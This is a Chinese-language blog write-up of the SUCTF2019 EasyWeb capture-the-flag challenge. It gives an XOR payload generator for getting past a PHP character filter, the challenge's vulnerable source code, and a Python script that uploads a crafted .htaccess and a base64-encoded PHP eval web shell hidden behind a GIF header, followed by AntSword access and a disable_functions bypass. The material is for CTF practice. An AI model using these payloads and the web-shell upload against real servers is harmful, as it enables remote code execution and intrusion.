[SUCTF2019] EasyWeb 常规做法 

<?php
$payload = '';
$a='_GET';
for($i=0;$i<strlen($a);$i++)
{   
    for($j=0;$j<255;$j++)
    {
        $k = chr($j)^chr(255);  //dechex(255) = ff
        if($k == $a[$i])
            $payload .= '%'.dechex($j);
    }
}
echo $payload;
?>

这个脚本可以计算出和%ff异或的东西,如$a='_GET',运行脚本输出的是%a0%b8%ba%ab,那么paylaod就是${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo

 

进去一个代码审计:

 <?php
function get_the_flag(){
    // webadmin will remove your upload file every 20 min!!!! 
    $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
    if(!file_exists($userdir)){
    mkdir($userdir);
    }
    if(!empty($_FILES["file"])){
        $tmp_name = $_FILES["file"]["tmp_name"];
        $name = $_FILES["file"]["name"];
        $extension = substr($name, strrpos($name,".")+1);
    if(preg_match("/ph/i",$extension)) die("^_^"); 
        if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
    if(!exif_imagetype($tmp_name)) die("^_^"); 
        $path= $userdir."/".$name;
        @move_uploaded_file($tmp_name, $path);
        print_r($path);
    }
}

$hhh = @$_GET['_'];

if (!$hhh){
    highlight_file(__FILE__);
}

if(strlen($hhh)>18){
    die('One inch long, one inch strong!');
}

if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )
    die('Try something else!');

$character_type = count_chars($hhh, 3);
if(strlen($character_type)>12) die("Almost there!");

eval($hhh);
?>

这里eval($hhh)可以 eval(get_the_flag();),即可以eval()一个函数。

Payload:${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag

 

传参payload之后,就会执行get_the_flag函数,就要上传文件了

 

上传文件用post传参,使用python脚本:

import requests
import base64

url="http://800193fd-9e82-480d-bb38-d73090263791.node4.buuoj.cn:81/?_=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag"

htaccess = b"""
#define width 1
#define height 1
AddType application/x-httpd-php .aa
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_c47b21fcf8f0bc8b3920541abd8024fd/shell.aa"
"""
shell = b"GIF89a00" + base64.b64encode(b"<?php eval($_POST[1]);?>")


file1 = {'file':('.htaccess',htaccess,'image/jpeg')}
data = {"upload":"submit"}
res = requests.post(url = url,data = data,files = file1)
print(res.text)

file2 = {'file':('shell.aa',shell,'image/jpeg')}
data = {"upload":"submit"}
res = requests.post(url = url,data = data,files = file2)
print(res.text)

 

然后连上蚁剑,使用绕过disable_function的插件,新建终端,在shell里cd到根目录,cat flag。

 

posted @ 2022-07-14 12:01  Galio  阅读(61)  评论(0编辑  收藏  举报